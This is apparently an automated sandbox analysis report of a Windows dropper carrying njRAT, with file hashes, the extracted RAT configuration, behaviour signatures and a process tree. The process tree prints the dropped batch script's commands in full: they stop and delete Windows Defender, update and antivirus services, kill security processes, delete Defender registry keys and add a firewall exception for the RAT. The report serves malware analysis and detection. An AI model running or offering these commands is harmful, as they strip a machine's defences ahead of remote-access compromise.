Analysis
-
max time kernel
153s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
29-09-2021 07:52
Static task
static1
Behavioral task
behavioral1
Sample
e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe
Resource
win7v20210408
General
-
Target
e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe
-
Size
341KB
-
MD5
e8fb8e14c5e50dd51a7499b84e2c857a
-
SHA1
bad853c5496bc28f492c01cdc6fff77efd72dc74
-
SHA256
e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c
-
SHA512
2b15a3c3cb4b04f978043d45ac32ed2ab7dfef11ec0b6010a73a2d39b8aa112b18846cb60383c63108fd7bcd4c7f9abae26b354320902a59f923d436d73f4131
Malware Config
Extracted
njrat
0.7d
cvcvc
127.0.0.1:6544
f08ba698cf12b161ed2e70452386d723
-
reg_key
f08ba698cf12b161ed2e70452386d723
-
splitter
Y262SUCZ4UJJ
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Nirsoft 5 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe Nirsoft -
Executes dropped EXE 5 IoCs
Processes:
AdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.execd.exepid process 2620 AdvancedRun.exe 3488 AdvancedRun.exe 2640 AdvancedRun.exe 2220 AdvancedRun.exe 2868 cd.exe -
Modifies Windows Firewall 1 TTPs
-
Stops running service(s) 3 TTPs
-
Drops file in Program Files directory 64 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe cmd.exe File opened for modification C:\Program Files\Windows Security\BROWSE~1\en-US\BrowserCore.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\WATPCSP.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\Offline\MsMpLics.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpResL.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe cmd.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\fr-FR\MsSense.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MsMpResL.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\ja-JP\MsSense.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpResL.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\Offline\EppManifest.dll cmd.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\de-DE\MsSense.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Security\BROWSE~1\BrowserCore.exe cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpResL.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncPS.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Security\BROWSE~1\manifest.json cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1920 taskkill.exe 1304 taskkill.exe 752 taskkill.exe 652 taskkill.exe 3888 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
AdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.execd.exepid process 2620 AdvancedRun.exe 2620 AdvancedRun.exe 2620 AdvancedRun.exe 2620 AdvancedRun.exe 3488 AdvancedRun.exe 3488 AdvancedRun.exe 3488 AdvancedRun.exe 3488 AdvancedRun.exe 2640 AdvancedRun.exe 2640 AdvancedRun.exe 2640 AdvancedRun.exe 2640 AdvancedRun.exe 2220 AdvancedRun.exe 2220 AdvancedRun.exe 2220 AdvancedRun.exe 2220 AdvancedRun.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe 2868 cd.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
Processes:
AdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execd.exedescription pid process Token: SeDebugPrivilege 2620 AdvancedRun.exe Token: SeImpersonatePrivilege 2620 AdvancedRun.exe Token: SeDebugPrivilege 3488 AdvancedRun.exe Token: SeImpersonatePrivilege 3488 AdvancedRun.exe Token: SeDebugPrivilege 2640 AdvancedRun.exe Token: SeImpersonatePrivilege 2640 AdvancedRun.exe Token: SeDebugPrivilege 2220 AdvancedRun.exe Token: SeImpersonatePrivilege 2220 AdvancedRun.exe Token: SeDebugPrivilege 652 taskkill.exe Token: SeDebugPrivilege 3888 taskkill.exe Token: SeDebugPrivilege 1920 taskkill.exe Token: SeDebugPrivilege 1304 taskkill.exe Token: SeDebugPrivilege 752 taskkill.exe Token: SeDebugPrivilege 2868 cd.exe Token: 33 2868 cd.exe Token: SeIncBasePriorityPrivilege 2868 cd.exe Token: 33 2868 cd.exe Token: SeIncBasePriorityPrivilege 2868 cd.exe Token: 33 2868 cd.exe Token: SeIncBasePriorityPrivilege 2868 cd.exe Token: 33 2868 cd.exe Token: SeIncBasePriorityPrivilege 2868 cd.exe Token: 33 2868 cd.exe Token: SeIncBasePriorityPrivilege 2868 cd.exe Token: 33 2868 cd.exe Token: SeIncBasePriorityPrivilege 2868 cd.exe Token: 33 2868 cd.exe Token: SeIncBasePriorityPrivilege 2868 cd.exe Token: 33 2868 cd.exe Token: SeIncBasePriorityPrivilege 2868 cd.exe Token: 33 2868 cd.exe Token: SeIncBasePriorityPrivilege 2868 cd.exe Token: 33 2868 cd.exe Token: SeIncBasePriorityPrivilege 2868 cd.exe Token: 33 2868 cd.exe Token: SeIncBasePriorityPrivilege 2868 cd.exe Token: 33 2868 cd.exe Token: SeIncBasePriorityPrivilege 2868 cd.exe Token: 33 2868 cd.exe Token: SeIncBasePriorityPrivilege 2868 cd.exe Token: 33 2868 cd.exe Token: SeIncBasePriorityPrivilege 2868 cd.exe Token: 33 2868 cd.exe Token: SeIncBasePriorityPrivilege 2868 cd.exe Token: 33 2868 cd.exe Token: SeIncBasePriorityPrivilege 2868 cd.exe Token: 33 2868 cd.exe Token: SeIncBasePriorityPrivilege 2868 cd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exeAdvancedRun.exeAdvancedRun.execmd.exedescription pid process target process PID 2160 wrote to memory of 2620 2160 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe AdvancedRun.exe PID 2160 wrote to memory of 2620 2160 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe AdvancedRun.exe PID 2620 wrote to memory of 3488 2620 AdvancedRun.exe AdvancedRun.exe PID 2620 wrote to memory of 3488 2620 AdvancedRun.exe AdvancedRun.exe PID 2160 wrote to memory of 2640 2160 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe AdvancedRun.exe PID 2160 wrote to memory of 2640 2160 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe AdvancedRun.exe PID 2640 wrote to memory of 2220 2640 AdvancedRun.exe AdvancedRun.exe PID 2640 wrote to memory of 2220 2640 AdvancedRun.exe AdvancedRun.exe PID 2160 wrote to memory of 3552 2160 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe cmd.exe PID 2160 wrote to memory of 3552 2160 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe cmd.exe PID 2160 wrote to memory of 3552 2160 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe cmd.exe PID 3552 wrote to memory of 1204 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1204 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1204 3552 cmd.exe sc.exe PID 3552 wrote to memory of 680 3552 cmd.exe sc.exe PID 3552 wrote to memory of 680 3552 cmd.exe sc.exe PID 3552 wrote to memory of 680 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1160 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1160 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1160 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3328 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3328 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3328 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1972 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1972 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1972 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1236 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1236 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1236 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1424 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1424 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1424 3552 cmd.exe sc.exe PID 3552 wrote to memory of 904 3552 cmd.exe sc.exe PID 3552 wrote to memory of 904 3552 cmd.exe sc.exe PID 3552 wrote to memory of 904 3552 cmd.exe sc.exe PID 3552 wrote to memory of 900 3552 cmd.exe sc.exe PID 3552 wrote to memory of 900 3552 cmd.exe sc.exe PID 3552 wrote to memory of 900 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3896 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3896 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3896 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3888 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3888 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3888 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3404 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3404 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3404 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3440 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3440 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3440 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1540 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1540 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1540 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1000 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1000 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1000 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3180 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3180 3552 cmd.exe sc.exe PID 3552 wrote to memory of 3180 3552 cmd.exe sc.exe PID 3552 wrote to memory of 2868 3552 cmd.exe sc.exe PID 3552 wrote to memory of 2868 3552 cmd.exe sc.exe PID 3552 wrote to memory of 2868 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1500 3552 cmd.exe sc.exe PID 3552 wrote to memory of 1500 3552 cmd.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe"C:\Users\Admin\AppData\Local\Temp\e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /EXEFilename test.bat /RunAs 8 /Run2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /SpecialRun 140020920 26203⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /EXEFilename test.bat /RunAs 8 /Run2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /SpecialRun 140020920 26403⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\test.bat" "2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc stop windefend3⤵
-
C:\Windows\SysWOW64\sc.exesc config windefend start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc delete windefend3⤵
-
C:\Windows\SysWOW64\sc.exesc stop WdNisSvc3⤵
-
C:\Windows\SysWOW64\sc.exesc config WdNisSvc start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc delete WdNisSvc3⤵
-
C:\Windows\SysWOW64\sc.exesc stop Sense3⤵
-
C:\Windows\SysWOW64\sc.exesc config Sense start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc delete Sense3⤵
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv3⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop usosvc3⤵
-
C:\Windows\SysWOW64\sc.exesc config usosvc start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop WaasMedicSvc3⤵
-
C:\Windows\SysWOW64\sc.exesc config WaasMedicSvc start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop SecurityHealthService3⤵
-
C:\Windows\SysWOW64\sc.exesc config SecurityHealthService start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc delete SecurityHealthService3⤵
-
C:\Windows\SysWOW64\sc.exesc stop SDRSVC3⤵
-
C:\Windows\SysWOW64\sc.exesc config SDRSVC start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop wscsvc3⤵
-
C:\Windows\SysWOW64\sc.exesc config wscsvc start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop WdiServiceHost3⤵
-
C:\Windows\SysWOW64\sc.exesc config WdiServiceHost start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop WdiSystemHost3⤵
-
C:\Windows\SysWOW64\sc.exesc config WdiSystemHost start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop InstallService3⤵
-
C:\Windows\SysWOW64\sc.exesc config InstallService Start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop VaultSvc3⤵
-
C:\Windows\SysWOW64\sc.exesc config VaultSvc start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop Spooler3⤵
-
C:\Windows\SysWOW64\sc.exesc config Spooler start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop LicenseManager3⤵
-
C:\Windows\SysWOW64\sc.exesc config LicenseManager start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop DiagTrack3⤵
-
C:\Windows\SysWOW64\sc.exesc config DiagTrack start= disabled3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im smartscreen.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SecurityHealthService.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f3⤵
- Modifies security service
-
C:\Windows\SysWOW64\sc.exesc delete windefend3⤵
-
C:\Windows\SysWOW64\sc.exesc delete sense3⤵
-
C:\Windows\SysWOW64\sc.exesc stop MBAMService3⤵
-
C:\Windows\SysWOW64\sc.exesc config MBAMService start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc delete MBAMService3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im MBAM.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exesc stop Bytefenceservice3⤵
-
C:\Windows\SysWOW64\sc.exesc delete Bytefenceservice3⤵
-
C:\Windows\SysWOW64\sc.exesc config Bytefenceservice start= disabled3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Bytefence.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exesc stop "avast! Tools"3⤵
-
C:\Windows\SysWOW64\sc.exesc config "avast! Tools" start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "avast! Tools"3⤵
-
C:\Windows\SysWOW64\sc.exesc stop "avast! Antivirus"3⤵
-
C:\Windows\SysWOW64\sc.exesc config "avast! Antivirus" start= disabled3⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe" "cd.exe" ENABLE3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exeMD5
9125a507060e4b3a3e287452cb71e7a1
SHA1fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8
SHA25629c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64
SHA5125282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exeMD5
9125a507060e4b3a3e287452cb71e7a1
SHA1fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8
SHA25629c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64
SHA5125282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exeMD5
9125a507060e4b3a3e287452cb71e7a1
SHA1fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8
SHA25629c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64
SHA5125282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exeMD5
9125a507060e4b3a3e287452cb71e7a1
SHA1fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8
SHA25629c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64
SHA5125282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exeMD5
9125a507060e4b3a3e287452cb71e7a1
SHA1fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8
SHA25629c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64
SHA5125282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exeMD5
41d608740bb964b50c7b79d28838a1c1
SHA1b604f184bcfb2fb1c533d02e43e572a90c2df080
SHA256826a457a8a39e24ac925b31bcdb24fdb97bd468ff913a30ea2ce66d7bb52181d
SHA5121e403c1003e7e5e2f33120f6dcdf8c51cdc0203b1a7d3fc5db2eda0b8f5366928d028b4da1d23dd80a056293aff877820649df12abbbb50a6ca601ad8015f3af
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exeMD5
41d608740bb964b50c7b79d28838a1c1
SHA1b604f184bcfb2fb1c533d02e43e572a90c2df080
SHA256826a457a8a39e24ac925b31bcdb24fdb97bd468ff913a30ea2ce66d7bb52181d
SHA5121e403c1003e7e5e2f33120f6dcdf8c51cdc0203b1a7d3fc5db2eda0b8f5366928d028b4da1d23dd80a056293aff877820649df12abbbb50a6ca601ad8015f3af
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\test.batMD5
fedd9cb5e3ffd5436e973e7a627f3d3c
SHA1d6b5eb6d7663b927afc92d5c890296e911bd9336
SHA256ccd0633359705388d3597b9af4589498faca61acad2ec0be2711cd73cf47c774
SHA512604e97d7fe1e5a7b72ad701625838546c7681352db507d6b0ff5f3dd4bef41d705f044f074391d12e3f316b88669df7163bfd37ec6dd0184a956f25ebd737911
-
memory/368-184-0x0000000000000000-mapping.dmp
-
memory/372-180-0x0000000000000000-mapping.dmp
-
memory/392-163-0x0000000000000000-mapping.dmp
-
memory/416-160-0x0000000000000000-mapping.dmp
-
memory/644-152-0x0000000000000000-mapping.dmp
-
memory/652-164-0x0000000000000000-mapping.dmp
-
memory/680-129-0x0000000000000000-mapping.dmp
-
memory/900-136-0x0000000000000000-mapping.dmp
-
memory/904-135-0x0000000000000000-mapping.dmp
-
memory/988-183-0x0000000000000000-mapping.dmp
-
